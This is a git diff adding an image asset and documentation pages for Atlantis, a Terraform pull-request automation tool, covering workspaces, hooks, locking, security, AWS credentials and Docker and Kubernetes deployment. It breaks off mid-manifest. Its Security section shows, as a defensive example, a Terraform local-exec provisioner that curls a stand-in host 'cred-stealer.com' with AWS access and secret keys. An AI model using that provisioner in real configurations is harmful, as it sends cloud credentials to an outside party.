b/runatlantis.io/.vuepress/public/mstile-70x70.png new file mode 100644 index 0000000000000000000000000000000000000000..d9b35bcac4c932babf614db9dd1e81e882202b13 GIT binary patch literal 6555 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 a single directory of Terraform configuration to be used to manage multiple distinct sets of infrastructure resources + +If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through the `-w` flag. +For example, +``` +atlantis plan -w staging +``` + +If a workspace is specified, Atlantis will use `terraform workspace select {workspace}` prior to running `terraform plan` or `terraform apply`. + +If you're using the `env/{env}.tfvars` [project structure](#project-structure) we will also append `-var-file=env/{env}.tfvars` to `plan` and `apply`. + +If no workspace is specified, we'll use the `default` workspace by default. +This replicates Terraform's default behaviour which also uses the `default` workspace. + +## Terraform Versions +By default, Atlantis will use the `terraform` executable that is in its path. To use a specific version of Terraform just install that version on the server that Atlantis is running on. + +If you would like to use a different version of Terraform for some projects but not for others +1. Install the desired version of Terraform into the `$PATH` of where Atlantis is running and name it `terraform{version}`, ex. `terraform0.8.8`. +2. 
In the project root (which is not necessarily the repo root) of any project that needs a specific version, create an `atlantis.yaml` file as follows +``` +--- +terraform_version: 0.8.8 # set to desired version +``` + +So your project structure will look like +``` +. +├── main.tf +└── atlantis.yaml +``` +Now when Atlantis executes it will use the `terraform{version}` executable. + +## Project-Specific Customization +An `atlantis.yaml` config file in your project root (which is not necessarily the repo root) can be used to customize +- what commands Atlantis runs **before** `init`, `get`, `plan` and `apply` with `pre_init`, `pre_get`, `pre_plan` and `pre_apply` +- what commands Atlantis runs **after** `plan` and `apply` with `post_plan` and `post_apply` +- additional arguments to be supplied to specific terraform commands with `extra_arguments` + - the commmands that we support adding extra args to are `init`, `get`, `plan` and `apply` +- what version of Terraform to use (see [Terraform Versions](#terraform-versions)) + +The schema of the `atlantis.yaml` project config file is + +```yaml +# atlantis.yaml +--- +terraform_version: 0.8.8 # optional version +# pre_init commands are run when the Terraform version is >= 0.9.0 +pre_init: + commands: + - "curl http://example.com" +# pre_get commands are run when the Terraform version is < 0.9.0 +pre_get: + commands: + - "curl http://example.com" +pre_plan: + commands: + - "curl http://example.com" +post_plan: + commands: + - "curl http://example.com" +pre_apply: + commands: + - "curl http://example.com" +post_apply: + commands: + - "curl http://example.com" +extra_arguments: + - command_name: plan + arguments: + - "-var-file=terraform.tfvars" +``` + +When running the `pre_plan`, `post_plan`, `pre_apply`, and `post_apply` commands the following environment variables are available +- `WORKSPACE`: if a workspace argument is supplied to `atlantis plan` or `atlantis apply`, ex `atlantis plan -w staging`, this will +be the value 
of that argument. Else it will be `default` +- `ATLANTIS_TERRAFORM_VERSION`: local version of `terraform` or the version from `terraform_version` if specified, ex. `0.8.8` +- `DIR`: absolute path to the root of the project on disk + +## Locking +When `plan` is run, the [project](#project) and [workspace](#workspaceenvironment) (**but not the whole repo**) are **Locked** until an `apply` succeeds **and** the pull request/merge request is merged. +This protects against concurrent modifications to the same set of infrastructure and prevents +users from seeing a `plan` that will be invalid if another pull request is merged. + +If you have multiple directories inside a single repository, only the directory will be locked. Not the whole repo. + +To unlock the project and workspace without completing an `apply` and merging, click the link +at the bottom of the plan comment to discard the plan and delete the lock. +Once a plan is discarded, you'll need to run `plan` again prior to running `apply` when you go back to that pull request. + +## Approvals +If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag. +By default, no approval is required. + +For more information on GitHub pull request reviews and approvals see: https://help.github.com/articles/about-pull-request-reviews/ + +For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html. + +## Security +Because you usually run Atlantis on a server with credentials that allow access to your infrastructure it's important that you deploy Atlantis securely. 
+ +Atlantis could be exploited by +* Running `terraform apply` on a malicious Terraform file with [local-exec](https://www.terraform.io/docs/provisioners/local-exec.html) +```tf +resource "null_resource" "null" { + provisioner "local-exec" { + command = "curl https://cred-stealer.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" + } +} +``` +* Running malicious hook commands specified in an `atlantis.yaml` file. +* Someone adding `atlantis plan/apply` comments on your valid pull requests causing terraform to run when you don't want it to. + +### Mitigations +#### Don't Use On Public Repos +Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos until Atlantis gets an authentication system. + +#### Don't Use `--allow-fork-prs` +If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) +because anyone can open up a pull request from their fork to your repo. + +#### `--repo-whitelist` +Atlantis requires you to specify a whitelist of repositories it will accept webhooks from via the `--repo-whitelist` flag. +For example: +* Specific repositories: `--repo-whitelist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` +* Your whole organization: `--repo-whitelist=github.com/runatlantis/*` +* Every repository in your GitHub Enterprise install: `--repo-whitelist=github.yourcompany.com/*` +* All repositories: `--repo-whitelist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. + +This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. + +#### Webhook Secrets +Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. 
+Even with the `--repo-whitelist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is whitelisted. +Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab). + + +## Server Configuration +Configuration for `atlantis server` can be specified via command line flags, environment variables or a YAML config file. +Config file values are overridden by environment variables which in turn are overridden by flags. + +### YAML +To use a yaml config file, run atlantis with `--config /path/to/config.yaml`. +The keys of your config file should be the same as the flag, ex. +```yaml +--- +gh-token: ... +log-level: ... +``` + +### Environment Variables +All flags can be specified as environment variables. You need to convert the flag's `-`'s to `_`'s, uppercase all the letters and prefix with `ATLANTIS_`. +For example, `--gh-user` can be set via the environment variable `ATLANTIS_GH_USER`. + +To see a list of all flags and their descriptions run `atlantis server --help` + +## AWS Credentials +Atlantis simply shells out to `terraform` so you don't need to do anything special with AWS credentials. +As long as `terraform` works where you're hosting Atlantis, then Atlantis will work. +See https://www.terraform.io/docs/providers/aws/#authentication for more detail. + +### Multiple AWS Accounts +Atlantis supports multiple AWS accounts through the use of Terraform's +[AWS Authentication](https://www.terraform.io/docs/providers/aws/#authentication). + +If you're using the [Shared Credentials file](https://www.terraform.io/docs/providers/aws/#shared-credentials-file) +you'll need to ensure the server that Atlantis is executing on has the corresponding credentials file. + +If you're using [Assume role](https://www.terraform.io/docs/providers/aws/#assume-role) +you'll need to ensure that the credentials file has a `default` profile that is able +to assume all required roles. 
+ +[Environment variables](https://www.terraform.io/docs/providers/aws/#environment-variables) authentication +won't work for multiple accounts since Atlantis wouldn't know which environment variables to execute +Terraform with. + +### Assume Role Session Names +Atlantis injects the Terraform variable `atlantis_user` and sets it to the GitHub username of +the user that is running the Atlantis command. This can be used to dynamically name the assume role +session. This is used at Hootsuite so AWS API actions can be correlated with a specific user. + +To take advantage of this feature, use Terraform's [built-in support](https://www.terraform.io/docs/providers/aws/#assume-role) for assume role +and use the `atlantis_user` terraform variable + +```hcl +provider "aws" { + assume_role { + role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME" + session_name = "${var.atlantis_user}" + } +} + +# need to define the atlantis_user variable to avoid terraform errors +variable "atlantis_user" { + default = "atlantis_user" +} +``` + +If you're also using the [S3 Backend](https://www.terraform.io/docs/backends/types/s3.html) +make sure to add the `role_arn` option: + +```hcl +terraform { + backend "s3" { + bucket = "mybucket" + key = "path/to/my/key" + region = "us-east-1" + role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME" + # can't use var.atlantis_user as the session name because + # interpolations are not allowed in backend configuration + # session_name = "${var.atlantis_user}" WON'T WORK + } +} +``` + +Terraform doesn't support interpolations in backend config so you will not be +able to use `session_name = "${var.atlantis_user}"`. However, the backend assumed +role is only used for state-related API actions. Any other API actions will be performed using +the assumed role specified in the `aws` provider and will have the session named as the GitHub user. + +## Glossary +#### Project +A Terraform project. Multiple projects can be in a single GitHub repo. 
+We identify a project by its repo **and** the path to the root of the project within that repo.
+
+#### Workspace/Environment
+A Terraform workspace. See [terraform docs](https://www.terraform.io/docs/state/workspaces.html) for more information.
+
+## FAQ
+**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?**
+
+A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`.
+
+**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?**
+
+A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening.
+
+Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands.
+
+**Q: How to run Atlantis in high availability mode? Does it need to be?**
+
+A: Atlantis server can easily be run under the supervision of an init system like `upstart` or `systemd` to make sure `atlantis server` is always running.
+
+Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently.
+
+However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway.
+
+**Q: How to add SSL to Atlantis server?**
+
+A: First, you'll need to get a public/private key pair to serve over SSL.
+These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags.
+See `atlantis server --help` for more information.
+
+**Q: How can I get Atlantis up and running on AWS?**
+
+A: There is a [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project that hosts complete, tested, and maintained Terraform configurations for running Atlantis on AWS Fargate.
+
+## Contributing
+Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md).
+
+## Credits
+Atlantis was originally developed at [Hootsuite](https://hootsuite.com) under [hootsuite/atlantis](https://github.com/hootsuite/atlantis). The maintainers are indebted to Hootsuite for supporting the creation and continued development of this project over the last 2 years. The Hootsuite values of building a better way and teamwork made this project possible, alongside constant encouragement and assistance from our colleagues.
+
+NOTE: We had to remove the "fork" label because otherwise code searches don't work.
+
+Thank you to these awesome contributors!
+- [@nicholas-wu-hs](https://github.com/nicholas-wu-hs)
+- [@nadavshatz](https://github.com/nadavshatz)
+- [@jwieringa](https://github.com/jwieringa)
+- [@suhussai](https://github.com/suhussai)
+- [@mootpt](https://github.com/mootpt)
+- [@codec](https://github.com/codec)
+- [@nick-hollingsworth-hs](https://github.com/nick-hollingsworth-hs)
+- [@mpmsimo](https://github.com/mpmsimo)
+- [@hussfelt](https://github.com/hussfelt)
+- [@psalaberria002](https://github.com/psalaberria002)
+
+* Atlantis Logo: Icon made by [freepik](https://www.flaticon.com/authors/freepik) from www.flaticon.com
+
diff --git a/runatlantis.io/docs/deployment.md b/runatlantis.io/docs/deployment.md
new file mode 100644
index 0000000000..cc6e5b1e08
--- /dev/null
+++ b/runatlantis.io/docs/deployment.md
@@ -0,0 +1,374 @@
+# Production-Ready Deployment
+[[toc]]
+## Install Terraform
+`terraform` needs to be in the `$PATH` for Atlantis.
+Download from https://www.terraform.io/downloads.html +```bash +unzip path/to/terraform_*.zip -d /usr/local/bin +``` +Check that it's in your `$PATH` +``` +$ terraform version +Terraform v0.10.0 +``` +If you want to use a different version of Terraform see [Terraform Versions](#terraform-versions) + +## Hosting Atlantis +Atlantis needs to be hosted somewhere that github.com/gitlab.com or your GitHub/GitLab Enterprise installation can reach. Developers in your organization also need to be able to access Atlantis to view the UI and to delete locks. + +By default Atlantis runs on port `4141`. This can be changed with the `--port` flag. + +## Add GitHub Webhook +Once you've decided where to host Atlantis you can add it as a Webhook to GitHub. +If you already have a GitHub organization we recommend installing the webhook at the **organization level** rather than on each repository, however both methods will work. + +::: tip +If you're not sure if you have a GitHub organization see https://help.github.com/articles/differences-between-user-and-organization-accounts/ +::: + +If you're installing on the organization, navigate to your organization's page and click **Settings**. +If installing on a single repository, navigate to the repository home page and click **Settings**. +- Select **Webhooks** or **Hooks** in the sidebar +- Click **Add webhook** +- set **Payload URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`** +- set **Content type** to `application/json` +- set **Secret** to a random key (https://www.random.org/strings/). 
You'll need to pass this value to the `--gh-webhook-secret` option when you start Atlantis +- select **Let me select individual events** +- check the boxes + - **Pull request reviews** + - **Pushes** + - **Issue comments** + - **Pull requests** +- leave **Active** checked +- click **Add webhook** + +## Add GitLab Webhook +If you're using GitLab, navigate to your project's home page in GitLab +- Click **Settings > Integrations** in the sidebar +- set **URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`** +- leave **Secret Token** blank or set this to a random key (https://www.random.org/strings/). If you set it, you'll need to use the `--gitlab-webhook-secret` option when you start Atlantis +- check the boxes + - **Push events** + - **Comments** + - **Merge Request events** +- leave **Enable SSL verification** checked +- click **Add webhook** + +## Create a GitHub Token +We recommend creating a new user in GitHub named **atlantis** that performs all API actions, however you can use any user. + +**NOTE: The Atlantis user must have "Write permissions" (for repos in an organization) or be a "Collaborator" (for repos in a user account) to be able to set commit statuses:** +![Atlantis status](./images/status.png) + +Once you've created the user (or have decided to use an existing user) you need to create a personal access token. +- follow [https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token) +- copy the access token + +## Create a GitLab Token +We recommend creating a new user in GitLab named **atlantis** that performs all API actions, however you can use any user. +Once you've created the user (or have decided to use an existing user) you need to create a personal access token. 
+- follow [https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token](https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token) +- create a token with **api** scope +- copy the access token + +## Start Atlantis +Now you're ready to start Atlantis! + +If you're using GitHub, run: +``` +$ atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET +2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141 +``` + +If you're using GitLab, run: +``` +$ atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET +2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141 +``` + +- `$URL` is the URL that Atlantis can be reached at +- `$USERNAME` is the GitHub/GitLab username you generated the token for +- `$TOKEN` is the access token you created. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_TOKEN` or `ATLANTIS_GITLAB_TOKEN` +- `$SECRET` is the random key you used for the webhook secret. If you left the secret blank then don't specify this flag. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_WEBHOOK_SECRET` or `ATLANTIS_GITLAB_WEBHOOK_SECRET` + +Atlantis is now running! +**We recommend running it under something like Systemd or Supervisord.** + +## Docker +Atlantis also ships inside a docker image. 
Run the docker image: + +```bash +docker run runatlantis/atlantis:latest server +``` + +### Usage +If you need to modify the Docker image that we provide, for instance to add a specific version of Terraform, you can do something like this: + +* Create a custom docker file +```bash +vim Dockerfile-custom +``` + +```dockerfile +FROM runatlantis/atlantis + +# copy a terraform binary of the version you need +COPY terraform /usr/local/bin/terraform +``` + +* Build docker image + +```bash +docker build -t {YOUR_DOCKER_ORG}/atlantis-custom -f Dockerfile-custom . +``` + +* Run docker image + +```bash +docker run {YOUR_DOCKER_ORG}/atlantis-custom server --gh-user=GITHUB_USERNAME --gh-token=GITHUB_TOKEN +``` + +## Kubernetes +Atlantis can be deployed into Kubernetes as a +[Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/) +or as a [Statefulset](https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/) with persistent storage. + +StatefulSet is recommended because Atlantis stores its data on disk and so if your Pod dies +or you upgrade Atlantis, you won't lose the data. On the other hand, the only data that +Atlantis has right now is any plans that haven't been applied and Atlantis locks. If +Atlantis loses that data, you just need to run `atlantis plan` again so it's not the end of the world. + +Regardless of whether you choose a Deployment or StatefulSet, first create a Secret with the webhook secret and access token: +``` +echo -n "yourtoken" > token +echo -n "yoursecret" > webhook-secret +kubectl create secret generic atlantis-vcs --from-file=token --from-file=webhook-secret +``` + +Next, edit the manifests below as follows: +1. Replace `` in `image: runatlantis/atlantis:` with the most recent version from https://github.com/runatlantis/atlantis/releases/latest. 
+ * NOTE: You never want to run with `:latest` because if your Pod moves to a new node, Kubernetes will pull the latest image and you might end +up upgrading Atlantis by accident! +2. Replace `value: github.com/yourorg/*` under `name: ATLANTIS_REPO_WHITELIST` with the whitelist pattern +for your Terraform repos. See [--repo-whitelist](#--repo-whitelist) for more details. +3. If you're using GitHub: + 1. Replace `` with the username of your Atlantis GitHub user without the `@`. + 2. Delete all the `ATLANTIS_GITLAB_*` environment variables. +4. If you're using GitLab: + 1. Replace `` with the username of your Atlantis GitLab user without the `@`. + 2. Delete all the `ATLANTIS_GH_*` environment variables. + +### StatefulSet Manifest +

+ Show... + +```yaml +apiVersion: apps/v1 +kind: StatefulSet +metadata: + name: atlantis +spec: + serviceName: atlantis + replicas: 1 + updateStrategy: + type: RollingUpdate + rollingUpdate: + partition: 0 + selector: + matchLabels: + app: atlantis + template: + metadata: + labels: + app: atlantis + spec: + securityContext: + fsGroup: 1000 # Atlantis group (1000) read/write access to volumes. + containers: + - name: atlantis + image: runatlantis/atlantis:v # 1. Replace with the most recent release. + env: + - name: ATLANTIS_REPO_WHITELIST + value: github.com/yourorg/* # 2. Replace this with your own repo whitelist. + + ## GitHub Config ### + - name: ATLANTIS_GH_USER + value: # 3i. If you're using GitHub replace with the username of your Atlantis GitHub user without the `@`. + - name: ATLANTIS_GH_TOKEN + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: token + - name: ATLANTIS_GH_WEBHOOK_SECRET + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: webhook-secret + + ## GitLab Config ### + - name: ATLANTIS_GITLAB_USER + value: # 4i. If you're using GitLab replace with the username of your Atlantis GitLab user without the `@`. + - name: ATLANTIS_GITLAB_TOKEN + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: token + - name: ATLANTIS_GITLAB_WEBHOOK_SECRET + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: webhook-secret + + - name: ATLANTIS_DATA_DIR + value: /atlantis + - name: ATLANTIS_PORT + value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override. + volumeMounts: + - name: atlantis-data + mountPath: /atlantis + ports: + - name: atlantis + containerPort: 4141 + resources: + requests: + memory: 256Mi + cpu: 100m + limits: + memory: 256Mi + cpu: 100m + volumeClaimTemplates: + - metadata: + name: atlantis-data + spec: + accessModes: ["ReadWriteOnce"] # Volume should not be shared by multiple nodes. + resources: + requests: + # The biggest thing Atlantis stores is the Git repo when it checks it out. 
+ # It deletes the repo after the pull request is merged. + storage: 5Gi +--- +apiVersion: v1 +kind: Service +metadata: + name: atlantis +spec: + ports: + - name: atlantis + port: 80 + targetPort: 4141 + selector: + app: atlantis +``` +
+ + +### Deployment Manifest +
+ Show... + +```yaml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: atlantis + labels: + app: atlantis +spec: + replicas: 1 + selector: + matchLabels: + app: atlantis + template: + metadata: + labels: + app: atlantis + spec: + containers: + - name: atlantis + image: runatlantis/atlantis:v # 1. Replace with the most recent release. + env: + - name: ATLANTIS_REPO_WHITELIST + value: github.com/yourorg/* # 2. Replace this with your own repo whitelist. + + ## GitHub Config ### + - name: ATLANTIS_GH_USER + value: # 3i. If you're using GitHub replace with the username of your Atlantis GitHub user without the `@`. + - name: ATLANTIS_GH_TOKEN + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: token + - name: ATLANTIS_GH_WEBHOOK_SECRET + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: webhook-secret + + ## GitLab Config ### + - name: ATLANTIS_GITLAB_USER + value: # 4i. If you're using GitLab replace with the username of your Atlantis GitLab user without the `@`. + - name: ATLANTIS_GITLAB_TOKEN + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: token + - name: ATLANTIS_GITLAB_WEBHOOK_SECRET + valueFrom: + secretKeyRef: + name: atlantis-vcs + key: webhook-secret + - name: ATLANTIS_PORT + value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override. + ports: + - name: atlantis + containerPort: 4141 + resources: + requests: + memory: 256Mi + cpu: 100m + limits: + memory: 256Mi + cpu: 100m +--- +apiVersion: v1 +kind: Service +metadata: + name: atlantis +spec: + ports: + - name: atlantis + port: 80 + 